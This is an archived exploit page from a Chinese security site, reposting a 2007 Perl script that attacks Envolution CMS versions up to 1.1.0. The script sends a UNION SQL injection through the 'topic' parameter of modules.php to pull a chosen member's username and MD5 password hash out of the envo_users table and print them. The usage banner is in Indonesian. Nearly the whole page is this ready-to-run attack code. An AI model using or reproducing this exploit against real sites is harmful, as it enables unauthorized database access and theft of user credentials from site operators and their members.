首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit
来源:newhack[dot]org 作者:k1tk4t 发布时间:2007-08-06  
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV < 3)
{
    usage();

    exit();
}

$site = $ARGV[0]; # Site Target
$path = $ARGV[1]; # Path direktori envolution_1-0-1
$usid = $ARGV[2]; # member id

$www = new LWP::UserAgent;
$sql = "$site/$path/modules.php?op=modload&name=News&file=index&catid=&topic=2%20and%201=2%20union%20all%20select%201,2,3,concat(pn_uname,0x3a,pn_pass)%20from%20envo_users%20where%20pn_uid=$usid/*";
print "\n\n [~] Mencari Username:Password(md5) member id = $usid \n";
$res = $www -> get($sql) or err();
$res -> content() =~ /<b>(.*)<\/b>/ or err();
print "\n [+] Username:Password(md5) member id = $usid  \n";
print "\n [>] $1 \n\n";

sub usage()
{
print "#############################################################\n";
print "#                      newhack[dot]org                      #\n";
print "#############################################################\n";
print "#        Envolution <= v1.1.0 Remote SQL Injection          #\n";
print "#       http://sourceforge.net/projects/envolution          #\n";
print "#          k1tk4t - newhack[dot]org - Indonesia             #\n";
print "#     cara penggunaan: enov.pl [site] [path] [member id]    #\n";
print "#       contoh: enov.pl http://localhost /html  2           #\n";
print "#-----------------------------------------------------------#\n";
print "# Thanks to; str0ke, xoron, y3dips,                         #\n";
print "# newhack[dot]org staff dan member                          #\n";
print "# mR.opt1lc,fusion,PusHm0v,Ghoz,fl3xu5,bius,iind_id,slackX  #\n";
print "# Semua Komunitas Hacker dan Sekuriti Indonesia;            #\n";
print "#############################################################\n";
}

sub err()
{
print "\n [-] Exploit gagal :( - cari yang lain!";
exit();
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CHILKAT ASP String (CkString.d
·Panda Antivirus 2008 Local Pri
·Microsoft Visual 6 (VDT70.DLL
·paBugs <= 2.0 Beta 3 (main.php
·Live for Speed S1/S2/Demo (.pl
·Live for Speed S1/S2/Demo (.mp
·Live for Speed S1/S2/Demo (.sp
·Cisco IOS Next Hop Resolution
·PHP <= 5.2.3 snmpget() object
·MS Internet Explorer 6 DirectX
·Microsoft DXMedia SDK 6 (Sourc
·Yahoo! Widget < 4.0.5 GetCompo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved